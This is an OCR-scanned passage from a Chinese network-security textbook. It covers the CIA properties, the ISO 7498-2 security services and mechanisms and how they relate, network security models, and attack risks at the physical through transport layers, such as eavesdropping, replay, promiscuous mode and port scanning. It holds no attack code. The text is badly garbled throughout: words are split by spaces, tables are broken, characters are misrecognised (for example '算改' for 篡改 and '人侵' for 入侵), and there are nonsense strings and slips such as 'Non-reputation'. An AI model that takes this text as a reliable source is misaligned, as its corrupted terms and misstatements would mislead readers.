核心 ,任何 信息 系统 都 势必 存在 一 些 安全 隐患 ,因此 ,必须 正视 威胁 和 攻击 ,依靠 先进 的 信息 
安全 技术 ,综合 分 析 安 全 风险 ,实施 适当 的 安全 防护 措施 ,达到 保护 信息 系统 的 目的 。 管 理 
是 信息 保障 的 关键 ,没有 完善 的 信息 安全 管理 规章 制度 以 及 法 律 法 规 , 就 无 法 保障 信息 
安全 。 

熟悉 了 信息 安全 的 发 展 历史 ,就 为 从 信息 安全 保障 体系 角度 全 面 认 识 网 络 安全 的 本 质 
打下 了 基础 。 


1.3.2 网 络 安全 的 定义 


什么 是 网 络 安全 ? 网络 安全 是 在 分 布 网 络 环境 中 ,对 信息 载体 即 处 理 载体 、 存 储 载体 、 
传输 载体 和 信息 的 处 理 \ 传 输 、 存 储 、 访 问 提供 安全 保护 ,以 防止 数据 、 信 息 内 容 或 拒绝 正常 
服务 或 被 非 授 权 使 用 和 算 改 。 

维护 信息 载体 的 安全 就 要 抵抗 网 络 和 系统 的 安全 威胁 ,这 些 威胁 手段 有 物理 侵犯 ,系统 
漏洞 ` 网 络 人 侵 . 恶 意 软件 、 存 储 损 坏 ,为 抵抗 对 网 络 和 系统 的 安全 威胁 ,通常 采取 的 安全 措 
施 包括 防火 墙 、 防 病毒 .人 侵 检测 漏洞 扫描 。 维 护 信息 自身 的 安全 就 要 抵抗 对 信息 的 安全 
威胁 ,这 些 威胁 手段 有 身份 假冒 .非法 访问 、 信 息 泄露 .数据 受 损 . 事 后 否认 。 为 抵抗 对 信息 
安全 的 威胁 ,通常 采取 身份 鉴别 ,访问 控制 数据 加 密 与 验证 .内容 过 滤 、 灾 难 恢复 等 安全 措施 。 

网 络 安全 具有 3 个 基本 属性 : 机 密 性 (Confidentiality) ,保证 数据 不 被 未 经 授权 的 用 
户 截 取 与 非法 使 用 ,防范 措施 是 口令 技术 ; @ 完 整 性 (Integrity) ,数据 是 真实 可 信和 的 ,其 发 
布 者 不 被 冒充 、 来 源 不 被 伪造 以 及 内 容 不 被 自 改 ,防范 措施 是 校 验 与 认证 技术 ; @ n] Hi PE 
(Availability) ,数据 可 被 授权 用 户 正常 使 用 ,防范 措施 是 确保 数据 处 于 一 个 可 靠 的 运行 状态 
= Pe 
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1.4 信息 安全 体系 


信息 安全 服务 和 安全 机 制 均 是 信息 安全 体系 结构 (Security architecuture) 的 主要 内 容 。 
信息 安全 体系 结构 是 指 对 信息 和 信息 安全 功能 的 抽象 描述 , 它 从 整体 上 定义 了 信息 及 信息 
系统 所 提供 的 安全 服务 、 安 全 机 制 以 及 各 种 安全 组 件 之 间 的 关系 和 交互 。 例 如 ,信息 安全 体 
系 结构 决定 了 用 于 防御 攻击 的 方法 ,方案 或 系统 以 及 它们 之 间 的 相互 关系 和 信息 交互 活动 。 
安全 体系 结构 包括 安全 策略 、 风 险 分 析 、 安 全 服务 、 安 全 机 制 和 安全 管理 等 内 容 。 其 中 ,风险 
分 析 是 前 提 , 安 全 策略 是 核心 ,而 安全 机 制 和 安全 服务 是 基础 。 

安全 服务 .安全 机 制 及 其 关系 也 是 信息 安全 体系 结构 中 的 重要 内 容 。ISO 7498 从 体系 
结构 的 角度 ,描述 了 TCP/IP 四 层 协议 必须 提供 的 安全 服务 及 安全 机 制 ,并 说 明了 安全 服务 
及 其 相应 的 安全 机 制 在 安全 体系 结构 中 的 关系 ,从 而 建立 了 TCP/IP 系统 的 安全 体系 结构 
框架 。 


1.4.1 安全 服务 


根据 ISO 7498 的 定义 ,安全 服务 (Security Service) 是 指 提供 数据 处 理 和 数据 传输 安全 
性 的 方法 。 安 全 服务 的 功能 是 对 抗 安全 攻击 。ISO 7498 一 2 定义 了 5 类 可 选择 的 安全 服 
务 ,如 表 1-1 所 示 。 





表 1-1 安全 服务 


分 类 安全 服务 

对 等 实体 认证 
数据 来 源 认证 

自主 访问 控制 

强制 访问 控制 
连接 机 密 性 

无 连接 机 密 性 

选择 字段 机 密 性 
业务 流 机 密 性 

可 恢复 的 连接 完整 性 
不 可 恢复 的 连接 完整 性 
数据 完整 性 选择 字段 的 连接 完整 性 
无 连接 完整 性 

选择 字段 的 无 连接 完整 性 
数据 来 源 的 不 可 否认 性 
信和 宿 的 不 可 否认 性 





认证 





访问 控制 





数据 机 密 性 











不 可 否认 性 





1. 认证 
认证 (Authentication) 是 为 通信 过 程 中 实体 和 数据 来 源 提供 鉴别 服务 。 认 证 分 为 对 等 
实体 认证 和 数据 来 源 认 证 。 对 等 实体 认证 也 称 为 身份 认证 ,在 网 络 通信 的 双方 A 和 B 之 
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间 , 需 要 对 等 地 双向 认证 ,A 可 认证 对 等 方 B 的 身份 ,B 可 认证 对 等 方 A 的 身份 。 数 据 来 源 
认证 是 指数 据 的 接收 方 证 实 所 收 到 数据 的 发 送 方 的 身份 。 

2. 访问 控制 

访问 控制 (Access Control) 是 保护 受 保护 的 资源 不 被 非 授 权 访 问 。 访 问 控制 可 以 控制 
不 同 用 户 对 信息 资源 的 访问 ,也 可 以 防止 授权 用 户 滥用 资源 。 访 问 控制 分 为 自主 访问 控制 
和 强制 访问 控制 。 自 主 访问 控制 是 指 用 户 可 以 通过 转让 自己 的 访问 控制 权限 ,从 而 实现 灵 
活 的 授权 管理 机 制 。 强 制 访问 控制 是 指 系统 有 一 个 系统 管理 员 实 施 权限 管理 ,用 户 不 能 修 
改 , 转 让 自己 的 权限 。 

3. 数据 机 密 性 

数据 机 密 性 (Data Confidentiality) 是 保护 数据 不 被 非 授权 泄露 。 数 据 机 密 性 包括 连接 
机 密 性 、 无 连接 机 密 性 、 选 择 字段 机 密 性 和 业务 流 机 密 性 。 连 接 机 密 性 是 指 为 一 次 连接 上 的 
所 有 用 户 数据 提供 机 密 性 保护 。 无 连接 机 密 性 是 指 为 单个 无 连接 中 的 全 部 用 户 数据 提供 机 
密 性 保护 。 选 择 字段 机 密 性 是 指 为 那些 被 选择 的 字段 提供 机 密 性 保护 ,这 些 字 段 或 处 于 连 
接 的 用 户 数据 中 ,或 为 单个 无 连接 中 的 字段 。 业 务 流 机 密 性 是 指 提供 的 保护 使 得 通过 观察 
通信 业务 流 而 不 能 推断 出 其 中 的 机 密 信息 。 数 据 加 密 (Data Encryption) 是 最 常用 的 数据 机 
密 性 保护 手段 。 加 密 技 术 分 为 两 类 : 一 类 是 基于 对 称 密 钥 的 加 密 算法 ,也 称 为 私 钥 算 法 ; 
另 一 类 是 基于 非 对 称 密 钥 的 加 密 算 法 ,也 称 为 公 钥 算法 。 加 密 手 段 分 为 软件 加 密 和 硬件 加 
密 。 软 件 加 密 的 优点 是 成 本 低 、 使 用 灵活 、 更 换 方便 ; 硬件 加 密 的 优点 是 效率 高 .安全 性 高 。 

4. 数据 完整 性 

数据 完整 性 (Data Integrity) 是 指 确保 接收 方 接收 到 的 数据 是 发 送 方 所 发 送 的 数据 , 且 
未 被 未 授权 算 改 。 破 坏 数据 完整 性 的 攻击 行为 包括 修改 、 删 除 \ 插 入 ,替换 或 重 发 ,因此 数据 
完整 性 服务 可 保证 合法 用 户 接收 和 使 用 该 数据 的 真实 性 。 数 据 完整 性 包括 可 恢复 的 连接 完 
整 性 ,不 可 恢复 的 连接 完整 性 .选择 字段 的 连接 完整 性 ,无 连接 完整 性 和 选择 字段 的 无 连接 
完整 性 。 可 恢复 的 连接 完整 性 是 指 为 连接 上 的 所 有 用 户 数据 提供 完整 性 保护 ,并 检测 整个 
数据 包 序 列 中 的 数据 是 否 遭 到 算 改 .插入 .删除 破坏 ,同时 进行 补救 和 恢复 。 不 可 恢复 的 连 
接 完整 性 与 可 恢复 的 连接 完整 性 服务 相同 ,只 是 不 进行 数据 的 补救 或 恢复 。 选 择 字段 的 连 
接 完 整 性 是 指 为 在 一 次 连接 上 传送 的 用 户 数 据 中 的 选择 字段 提供 完整 性 保护 ,从 而 判断 出 
这 些 被 选 字段 是 否 遭 受 了 算 改 、 插 入、 删除 破坏 或 不 可 用 攻击 。 无 连接 完整 性 是 指 为 单个 无 
连接 的 数据 包 提 供 完整 性 保护 ,从 而 判断 出 一 个 接收 到 的 数据 包 是 否 被 算 改 。 选 择 字段 的 
无 连接 完整 性 是 指 为 单个 无 连接 的 数据 包 中 的 被 选 字段 提供 完整 性 保护 ,从 而 判断 出 被 选 
字段 的 内 容 是 否 被 算 改 。 

5. 不 可 否认 性 

不 可 否认 性 (Non-reputation) 是 指 防止 通信 中 的 任 一 实体 否认 他 过 去 执行 的 某 个 操作 
或 者 行为 。 具 体 来 说 ,不 可 否认 要 保证 , 当 信 息 从 发 送 方 传递 到 接收 方 后 ,发 送 方 不 能 否认 
这 些 信 息 是 自己 所 发 出 的 ; 如 果 确 实 收 到 了 发 送 方 所 发 送 的 消息 ,接收 方 不 能 否认 自己 没 
有 收 到 。 数 字 签 名 技术 是 实现 不 可 否认 性 服务 的 主要 方式 之 一 。 不 可 否认 性 包括 数据 来 源 
的 不 可 否认 性 和 信 宿 的 不 可 否认 性 。 数 据 来 源 的 不 可 否认 性 是 指 为 数据 接收 者 B 提供 数 
据 的 “来 源 证 据 ”, 从 而 防止 发 送 者 A 否认 发 送 过 这 些 数据 或 否认 其 内 容 。 信 和 宿 的 不 可 否认 
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性 是 指 为 数据 的 发 送 者 A 提供 数据 的 “交付 证 据 ”, 以 使 接收 者 B 以 后 不 能 不 承认 收 到 过 这 
些 数据 或 否认 其 内 容 。 


1.4.2 安全 机 制 


安全 机 制 (Security Mechanism) 是 保护 信息 系统 安全 措施 的 总 称 。 安 全 机 制 的 内 涵 是 
检测 .防御 和 恢复 攻击 的 技术 。TCP/IP 安全 体系 定义 了 8 种 安全 机 制 ,这 些 安全 机 制 可 以 
设置 在 适当 的 网 络 协议 层 上 ,以 提供 某 些 安全 服务 。 

1. 加 密 机 制 

加 密 (Encipherment) 机 制 是 网 络 安全 的 核心 技术 , 既 能 为 数据 提供 机 密 性 ,也 能 为 通信 
业务 流 信息 提供 机 密 性 , 且 还 成 为 其 他 安全 机 制 中 的 一 部 分 或 起 补充 作用 。 加 密 技术 包括 
对 称 加 密 技术 和 非 对 称 加 密 技术 。 加 密 方式 包括 链 到 链 加 密 和 端 到 端 加 密 。 

2. 数字 签名 机 制 

数字 签名 (Data Signature) 机 制 包括 两 个 过 程 , 即 签 名 和 验证 。 签 名 过 程 一 般 使 用 签名 
者 所 拥有 的 私有 信息 (如 私 钥 ) 进 行 操作 ,而 在 验证 过 程 中 ,验证 者 需要 使 用 公之于众 的 规程 
与 信息 (如 公 钥 ) 进 行 验证 。 当 然 ,验证 者 不 能 从 这 些 公开 信息 中 推断 出 签名 者 的 私有 信息 。 

3. 访问 控制 机 制 

访问 控制 (Access Control) 机 制 用 于 保护 受 保护 的 资源 不 被 非 授 权 使 用 。 为 了 确定 或 
实施 一 个 实体 对 资源 的 访问 权 , 访 问 控制 机 制 可 以 使 用 该 实体 已 鉴别 的 身份 ,或 使 用 该 实体 
的 有 关 身 份 信息 (如 它 与 一 个 已 知 的 实体 集 的 从 属 关系 ), 或 使 用 该 实体 所 拥有 的 权力 。 当 
实体 试图 使 用 非 授权 的 资源 ,或 以 不 正当 方式 滥用 授权 资源 时 ,访问 控制 组 件 将 拒绝 这 一 企 
图 ,并 产生 一 个 报警 信号 或 将 其 作为 安全 审计 跟踪 的 一 部 分 记录 下 来 ,以 供 事后 审计 。 

4. 数据 完整 性 机 制 

数据 完整 性 机 制 包括 单个 数据 单元 或 字段 的 完整 性 以 及 数据 单元 流 或 字段 流 的 完整 性 
两 个 方面 。 一 般 来 说 ,用 来 提供 这 两 种 完整 性 服务 的 机 制 不 相同 。 

5. 认证 交换 机 制 

认证 交换 (Authentication Exchange) 机 制 就 是 在 以 认证 者 和 被 认证 者 之 间 交 换 某 些 共 
享 信息 的 方式 来 实现 认证 功能 。 认 证 交换 技术 方法 有 3 类 : 使 用 鉴别 信息 ,如 口令 
(PASSWORD) ,由 发 送 方 提供 ,由 接收 方 验证 ; 加 口令 技术 ,如 公 钥 机 制 或 对 称 口 令 机 制 ; 
加 使 用 该 实体 的 特征 或 占有 物 , 如 认证 令 牌 . 指 纹 . 虹 膜 等 。 

6. 业务 填充 机 制 

业务 填充 (Traffic Padding) 机 制 是 指 通过 发 送 额 外 的 数据 来 掩盖 正常 通信 流量 特征 ， 
从 而 达到 保护 业务 流 机 密 性 的 目的 。 业 务 填充 机 制 能 用 来 提供 各 种 不 同 级 别 的 保护 ,从 而 
阻止 对 业务 流 的 分 析 。 这 种 机 制 只 有 在 业务 流 填充 受到 机 密 服 务 保护 时 才 有 效 。 

7. 路 由 控制 机 制 

路 由 控制 (Routing Control) 机 制 是 指 通过 对 路 由 过 程 的 控制 ,以 达到 安全 保护 的 目的 ， 
如 多 协议 标记 交换 (Multi Protocol Label Switch, MPLS) 就 是 路 由 控制 机 制 的 实现 方式 
== 
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8. 公证 机 制 

公证 (Notarization) 机 制 利用 可 信 第 三 方 来 实现 安全 功能 。 公 正 机 制 建立 在 第 三 方 公 
正 的 信誉 基础 上 ,通信 中 的 所 有 实体 必须 完全 信任 该 可 信 第 三 方 。 
1.4.3 安全 服务 与 安全 机 制 的 关系 

安全 服务 和 安全 机 制 虽然 是 截然 不 同 的 两 个 概念 ,但 是 两 者 联系 紧密 。 具 体 而 言 ,安全 


服务 由 安全 机 制 来 实现 ; 一 种 安全 机 制 可 以 实现 一 种 或 多 种 安全 服务 ; 一 种 安全 服务 可 以 
由 一 种 或 多 种 安全 机 制 来 实现 ,如 表 1-2 所 示 。 


表 1-2 安全 服务 与 安全 机 制 的 关系 








安全 服务 me 数字 | 访问 | 数据 完 | 认证 | 业务 | 路 由 
签名 | 控制 | 整 性 | 交换 | 填充 | 控制 

同等 实体 认证 Y Y x 

数据 来 源 认证 E y 

访问 | 自主 访问 控制 x 

控制 | 强制 访问 控制 d Y 

连接 机 密 性 

数据 机 | 无 连接 机 密 性 

密 性 | 选择 字段 机 密 性 

业务 流 机 密 性 

带 恢复 连接 完整 性 

无 恢复 连接 完整 性 

选择 域 连接 完整 性 

无 连接 完整 性 

选择 域 无 连接 完整 性 

不 可 否 | 数据 来 源 的 不 可 否认 性 

AME | 信和 宿 的 不 可 否认 性 Y 
ik: 表 中 v 表 示 对 应 的 安全 机 制 ( 行 ) 可 以 实现 对 应 的 安全 服务 ( 行 )。 
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1.5 ”网络 安全 模型 


为 了 完成 安全 处 理 ,常常 需要 可 信 的 第 三 方 。 例 如 ,第 三 方 可 负责 为 两 个 主体 分 发 秘密 
信息 ,而 对 开放 网 络 是 保密 的 。 又 如 ,需要 第 三 方 来 仲裁 两 个 主体 在 报 文 传输 的 身份 认证 争 
执 。 在 设计 网 络 安全 系统 时 ,网 络 安全 模型 应 完成 以 下 基本 任务 : 设计 算法 以 实现 和 安 
全 有 关 的 转换 ;四 产生 一 个 秘密 信息 用 于 设计 的 算法 ; @ 开 发 一 个 分 发 和 共享 秘密 信息 的 
方法 ; @ 确 定 两 个 主体 使 用 的 协议 ,用 于 使 用 秘密 算法 与 秘密 信息 以 得 到 特定 的 安全 服务 。 

图 1-8 给 出 了 一 个 通用 的 网 络 安 全 模型 , 报 文 从 源 站 经 网 络 (Internet) 送 至 目的 站 , 源 
站 和 目的 站 是 处 理 的 两 个 主体 ,它们 必须 协同 处 理 这 个 交换 。 这 是 一 个 通用 模型 , 它 不 能 涵 
盖 所 有 人 情况。 图 1-9 给 出 了 一 个 网 络 访问 安全 模型 ,该 模型 考虑 了 黑客 攻击 ,病毒 与 蠕虫 等 
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的 非 授 权 访问 。 黑 客 攻击 可 以 形成 两 类 威胁 : 一 类 是 信息 访问 威胁 , 即 非 授 权 用 户 截获 或 
修改 数据 ; 另 一 类 是 服务 威胁 , 即 服务 流 激 增 以 禁止 合法 用 户 使 用 。 病 毒 和 里 虫 是 软件 攻 
击 的 两 个 实例 ,这 类 攻击 通常 是 通过 移动 存储 介质 引入 系统 ; 也 可 以 通过 网 络 接 人 系统 。 


"pa 
秘 和 



























主体 主体 
JX —=] I = x 
秘密 信息 一 | 一 秘密 信息 
安全 转换 安全 转换 





攻击 对 手 
1-8 网 络 安全 模型 


在 图 1-9 中 ,对 非 授 权 访问 的 安全 机 制 可 分 为 两 类 : 第 一 类 是 网 闸 功能 ,包括 基于 口令 
登录 过 程 所 有 非 授 权 访问 以 及 屏蔽 逻辑 以 检测 ,拒绝 病毒 .蠕虫 和 其 他 类 似 攻 击 ; 第 二 类 是 
内 部 的 安全 控制 ,一旦 非 授 权 用 户 或 软件 攻击 得 到 访问 权 , 第 二 道 防线 将 对 其 进行 防御 , 包 
括 各 种 内 部 控制 的 监控 和 分 析 , 以 检测 人 侵 者 。 
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毒 、 蠕 虫 访问 通道 网 闸 功能 
内 部 安全 控制 











1-9 网 络 访问 安全 模型 


1.6 Internet 安全 体系 结构 


不 同类 型 的 漏洞 .攻击 和 威胁 存在 于 Internet 的 不 同 层次 ,Internet 安全 体系 结构 就 是 
依照 层次 结构 的 原则 ,对 不 同类 型 的 攻击 实施 不 同 层次 的 保护 。 


1.6.1 物理 网 络 风 险 及 安全 


物理 网 的 攻击 集中 在 物理 网 部 件 。 攻 击 包 括 窃 听 、 回 答 ( 重 放 )、 插 入 和 拒绝 服务 
(DoS)。 这 些 攻 击 仅 限于 能 物理 访问 的 攻击 者 ,所 以 限制 物理 访问 也 就 限制 了 攻击 的 存在 。 
1. 窃听 


物理 连接 器 允许 直接 访问 网 络 介 质 ,这 就 使 攻击 者 能 通过 物理 介质 窃听 (Eavesdropping) 
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数据 。 当 网 络 有 开放 的 分 接头 、 可 访问 的 分 接头 或 物理 访问 介质 时 ,网 络 就 易于 被 窃听 。 例 
如 ,攻击 者 能 使 用 带 开放 端口 的 网 络 Hub ,直接 窃听 并 记录 网 络 接口 所 有 网 络 通信 。 因 此 ， 
阻止 或 限制 访问 开放 端口 就 能 缓解 风险 。 

2. 回答 ( 重 放 ) 

窃听 是 一 种 相对 被 动 的 攻击 ,能 经 常 进行 而 不 易 被 检测 到 。 另 一 种 是 主动 攻击 ,因为 网 
络 连接 器 允许 发 送 , 也 可 接收 ,攻击 者 能 主动 发 送 数据 到 网 上 。 回 答 攻击 是 基于 记录 网 上 接 
收 到 的 信号 ,并 给 网 络 返回 。 这 种 类 型 攻击 不 需要 知道 数据 的 意思 ,而 仅仅 是 将 其 返回 。 

3. 插入 

类 似 于 回答 攻击 ,插入 攻击 是 发 送 数 据 , 但 不 是 返回 接收 到 的 数据 ,而 是 新 的 数据 。 这 
种 攻击 通常 是 用 来 访问 目标 系统 的 网 络 高 层 。 例 如 ,假如 网 络 基 于 物理 层 身份 鉴别 限制 访 
问 , 攻 击 者 可 窃听 网 络 ,并 在 身份 鉴别 完成 后 插入 数据 。 

4. 拒绝 服务 (DoS) 

物理 网 络 是 最 易 受 DoS 攻击 的 ,包括 不 经 意 的 和 故意 的 。 不 经 意 的 DoS 诸如 Hub 的 
电源 接 插 头 掉 了 、 网 络 连接 器 碰 掉 了 等 。 故 意 的 DoS 攻击 包括 物理 切断 电缆 ,或 将 低压 电 
费 插 入 高 压 源 ,以 致 将 网 络 设备 烧 断 等 。 对 RF 电源 和 无 线 网 络 ,无 线 频率 干扰 RF 是 最 有 
效 的 破坏 网 络 的 方法 ,包括 不 经 意 的 和 故意 的 。 

物理 层 只 能 提供 对 物理 链 路 的 访问 以 及 对 通过 对 物理 介质 传输 的 数据 编码 和 解码 ,而 
没有 通用 的 物理 层 协议 直接 提供 安全 。 对 物理 层 攻击 源 的 识别 能 力 取决 于 网 络 介质 .配置 
和 规模 。 


1.6.2 数据 链 路 层 风险 及 安全 


数据 链 路 层 通常 提供 到 物理 层 的 接口 ,以 确保 数据 在 网 络 两 个 节点 之 间 安 全 传递 。 然 
而 ,对 一 些 不 正常 的 使 用 ,表明 网 络 受到 了 攻击 ,这 些 攻击 包括 随意 模式 的 监控 、 网 络 负载 、 
寻 址 、 在 帧 外 的 (Out of frame) 数 据 以 及 数据 通道 。 

虽然 有 很 多 类 型 的 不 正常 使 用 和 滥用 ,但 它们 都 需要 直接 物理 访问 到 网 络 。 这 些 攻 击 
的 范围 仅 限 于 数据 链 路 层 。 对 连接 到 路 由 器 和 网 关 的 网 络 ,这 些 滥用 能 给 予 防护 。 

1. 随意 模式 

在 正常 模式 下 ,网络 寻 址 机 制 (也 就 是 MAC) 能 阻止 上 面 的 堆栈 层 接 收 非 指向 该 节点 
的 数据 。 然 而 很 多 网 络 接口 支持 无 地 址 过 滤 ,运行 在 随意 模式 的 节点 能 接收 所 有 报 文 帧 ,而 
不 只 是 指向 该 节点 的 帧 。 随 意 模式 允许 攻击 者 接收 所 有 来 自 网 络 的 数据 。 

2. 攻击 

数据 链 路 层 基 本 上 是 一 个 软件 层 , 这 意味 着 需要 处 理 器 来 处 理 每 个 分 组 ; 大 部 分 数据 
链 路 地 址 过 滤 开 销 很 低 , 而 高 层 经 常 需要 消耗 更 多 CPU 资源 ; 数据 链 路 攻击 会 明显 增加 节 
点 的 CPU 负载 。 在 多 主机 的 网 络 上 ,每 个 主机 接收 每 个 广播 帧 ,这 些 帧 必须 通过 数据 链 路 
层 ,在 该 层 以 及 高 层 进行 处 理 ; 简单 地 收 处 理 和 处 理 单个 广播 报 文 帧 ,不 会 消耗 很 多 资源 ; 
但 是 上 千 个 广播 分 组 的 处 理 , 对 节点 会 产生 很 多 开销 ,进而 对 实时 或 关键 服务 器 产生 严重 


影响 。 
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3. 地 址 攻击 

大 部 分 地 址 机 制 允许 一 个 节点 改变 有 效 网 络 地 址 ,假如 两 个 节点 配置 成 相同 地 址 ,其 结 
果 是 两 者 都 被 拒绝 网 络 连接 。 使 用 网 络 地 址 作为 访问 标记 的 系统 很 容易 被 挫 垮 ,攻击 者 正 
是 需要 将 地 址 改变 为 任何 允许 值 , 在 随意 模式 下 观察 网 络 ,攻击 者 能 识别 可 接受 的 地 址 。 

4. 帧 外 数据 

不 包含 在 报 文 帧 内 的 数据 通常 会 被 丢弃 ,然而 不 包含 在 报 文 帧 的 信息 能 在 物理 层 传输 。 
这 个 帧 外 数据 能 节省 网 络 带 宽 , 或 将 信息 转换 成 非 标准 形式 。 

5. 转换 通道 

数据 链 路 层 除 了 成 帧 和 传播 以 外 ,还 可 以 有 别 的 用 处 ,很 多 高 层 功能 可 以 在 数据 链 路 层 
执行 ,攻击 者 能 生成 后 门 和 类 似 数据 链 路 层 协议 的 远程 控制 协议 。 

6. 物理 风险 

数据 链 路 层 是 独立 于 物理 层 运行 的 ,物理 层 能 被 蔡 换 而 不 影响 数据 链 路 层 , 如 将 
10Base-T 换 成 100Base-T 无 须 改 变数 据 链 路 层 。 正 是 因为 这 种 独立 性 ,数据 链 路 层 对 所 有 
物理 层 风险 无 抵抗 能 力 。 例 如 ,物理 层 攻击 者 能 直接 访问 数据 链 路 层 报 文 帧 ; 物理 层 攻击 
者 能 窃听 所 有 数据 链 路 层 通 信 ; 物理 层 攻击 者 能 记录 和 回答 数据 链 路 层 通信 ,而 且 回答 数 
据 能 被 数据 链 路 层 接 收 ; 物理 层 攻 击 者 能 使 用 插入 攻击 生成 一 个 带 有 有 效 数 据 链 路 报 文 帧 
的 负载 攻击 。 
1.6.3 网 络 层 风 险 及 安全 


1. 路 由 风险 

网 络 路 由 器 是 用 于 和 和 远 距 离 网 络 通信 的 一 种 方案 。 对 路 由 器 的 直接 攻击 会 十 扰 和 其 他 
网 络 的 通信 。 即 使 物理 层 和 数据 链 路 层 未 受 损 , 而 网 络 层 受 损 ,也 可 以 阻止 网 络 路 由 。 基 于 
路 由 器 的 攻击 有 直接 攻击 、 表 中 毒 、 表 淹没 、 度 量 攻击 以 及 路 由 器 环 路 攻击 。 

2. 地 址 机 制 的 风险 

网 络 层 并 未 定义 对 地 址 的 身份 鉴别 和 验证 。 基 于 数字 和 名 字 的 地 址 机 制 容易 受到 假 地 
址 和 拦截 的 攻击 。 地 址 机 制 的 攻击 主要 有 假 地 址 、 地 址 拦截 、 假 释放 攻击 和 假 的 动态 分 配 。 

3. 分 段 的 风险 

所 有 分 段 机 制 有 两 个 主要 风险 , 即 丢失 分 段 和 组 装 数据 的 容量 。 分 段 管理 的 类 型 能 导 
致 丢失 数据 。 分 段 的 风险 主要 有 丢失 分 段 攻击 、 最 大 的 不 分 段 大 小 和 分 段 重组 的 攻击 。 


1.6.4 传输 层 风险 及 安全 

传输 层 的 主要 风险 在 于 序列 号 和 端口 。 要 拦截 传输 层 连接 ,攻击 者 必须 破坏 分 组 排序 。 
只 要 目标 瞄准 端口 ,远程 攻击 者 可 针对 一 个 专门 的 高 层 服务 进行 破坏 。 传 输 层 还 能 导致 侦 
察 攻击 ,包括 端口 扫描 和 信息 泄露 。 

1. 传输 层 拦截 

拦截 攻击 可 能 发 生 在 任何 一 个 网 络 层次 :但 传输 层 攻 击 需 要 两 个 条 件 ,一 是 攻击 者 只 能 











$13 网 络 安全 概述 15 





对 某 种 类 型 网 络 层 破坏 ; 二 是 攻击 者 必须 识别 传输 序列 。 

从 攻击 者 的 角度 看 ,分 组 序列 号 可 导致 传输 层 拦 截 ,并 有 助 于 重 构 观察 到 的 数据 传输 。 
没有 拦截 和 继续 传输 序列 的 能 力 ,分 组 就 无 法 得 到 回答 响应 ,新 的 分 组 也 不 能 被 接受 。 例 
如 ,TCP 包含 分 组 序列 号 、 下 一 个 序列 号 以 及 对 上 一 个 序列 号 的 回答 响应 ,并 组 合 在 一 个 分 
组 头 内 。 攻 击 者 观察 TCP 分 组 头 能 识别 序列 的 下 一 个 分 组 以 及 任何 需要 回答 响应 的 分 组 。 
一 般 来 说 ,拦截 传输 层 连接 的 能 力 取 决 于 序列 号 的 质量 。 

为 了 完成 一 次 拦截 ,攻击 者 必须 伪装 网 络 层 通 信 。 伪 装 的 分 组 必须 包含 源 地 址 、 目 的 地 
址 、 源 端口 。 随 机 序列 号 能 减少 传输 层 拦截 的 风险 。 像 UDP 这 种 不 用 序列 号 的 协议 更 易 
受 攻击 。 

2. 一 个 端口 和 多 个 端口 的 比较 

减少 节点 的 端口 数 ,能 减少 攻击 因素 。 加 固 的 服务 器 将 开放 的 端口 数 减 少 到 只 有 基本 
服务 。 公 共 的 Web 服务 器 仅 有 HTTP(80/TCP) 打开 ,远程 控制 台 只 有 SSH (22/TCP) 
和 打开。 

一 般 来 说 ,打开 的 系统 端口 少 更 安全 。 但 是 某 些 服务 支持 多 路 端口 ,或 基于 服务 的 需求 
打开 新 的 端口 。 例 如 ,代理 只 有 一 个 端口 打开 (1080/TCP 用 于 SOCKS), 但 一 个 端口 可 连 
接 很 多 其 他 系统 以 及 很 多 其 他 端口 。 又 如 ,SSH 支持 端口 转发 ,虽然 SSH 仅 使 用 一 个 端 
口 , 但 远程 客户 可 从 很 多 端口 将 通信 转发 到 SSH 安全 隧道 。 即 使 SSH 隧道 是 安全 的 ,但 隧 
道 的 端点 可 能 是 不 安全 的 。 

3. 静态 端口 赋值 和 动态 端口 赋值 

远程 客户 连接 到 服务 器 需要 两 个 条 件 : 一 是 需要 服务 器 的 网 络 地 址 ; 二 是 需要 知道 传 
输 协议 及 端口 。 

客户 启动 服务 器 连接 时 ,通常 连接 到 服务 器 中 众所周知 的 端口 。 但 有 时 客户 只 是 短暂 
地 使 用 端口 ,这 就 需要 选择 动态 端口 。 为 了 使 服务 器 回答 客户 ,客户 的 分 组 要 包括 网 络 地 址 
和 端口 号 。 

防火 墙 使 用 端口 信息 提供 网 络 访问 。 某 些 高 层 协议 不 使 用 固定 端口 号 ,如 RPC, FTP 
的 数据 连接 以 及 Net meeting。 不 用 单个 端口 与 全 部 通信 ,控制 服务 使 用 众所周知 的 端口 ， 
数据 传输 则 用 动态 端口 ,只 需 启 动 连接 到 控制 服务 便 可 产生 一 个 报 文 以 标识 动态 端口 号 。 

动态 端口 会 引起 不 安全 的 风险 ,因为 大 范围 的 端口 必须 都 是 可 访问 的 端口 ,如 FTP ^E 
成 的 第 2 个 端口 来 传输 数据 ,动态 端口 可 选用 任何 未 使 用 的 端口 号 ,如 果 防 火 墙 不 打开 所 有 
瑞 口 ,FTP 数据 连接 就 会 被 阻 断 。 有 一 些 FTP 通过 防火 墙 的 可 行 方案 ,但 都 存在 隐患 或 局 
限 性 。 

4. 端口 扫描 

为 了 攻击 一 个 服务 ,必须 识别 服务 端口 。 端 口 扫描 的 任务 是 企图 连接 到 主机 的 每 一 个 
端口 。 假 如 端口 有 回答 , 则 活动 服务 正在 监听 端口 。 假 如 服务 是 在 众所周知 的 端口 , 则 增加 
了 服务 识别 的 可 能 性 。 扫 描 方法 一 般 有 两 种 ,一 种 是 目标 端口 扫描 ,用 以 测试 特定 的 端口 ， 
另 一 种 是 端口 扫除 (Sweep) ,用 以 测试 主机 上 所 有 可 能 的 端口 。 有 很 多 种 方法 可 防御 端口 
扫描 ,包括 非 标准 端口 .无 回答 防御 .总 是 回答 防御 — E TJ B IX (Knock-knock ProtocoD , XE 
动 扫描 检测 以 及 故意 延迟 等 。 
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5. 信息 泄露 

一 般 传 输 层 对 传输 的 数据 不 进行 加 密 , 因 此 传输 层 协议 本 身 并 不 对 信息 起 保护 作用 。 
在 网 上 监控 分 组 通信 的 观察 者 能 观察 到 传输 层 协议 的 内 容 。 防 止 信息 泄露 的 方法 通常 是 在 
传输 层 上 面 的 高 层 设置 身份 鉴别 和 加 密 。 


1.6.5 应 用 层 风 险 及 安全 


应 用 层 风 险 包 括 会 话 层 、 表 示 层 和 应 用 层 上 面临 的 安全 威胁 。 基 于 TCP/IP 模型 网 络 
安全 的 讨论 ,因此 下 面 也 不 区 分 会 话 层 、 表 示 层 、 应 用 层 , 统 一 称 为 应 用 层 。 应 用 层 安 全 风险 
主要 有 以 下 几 个 方面 。 

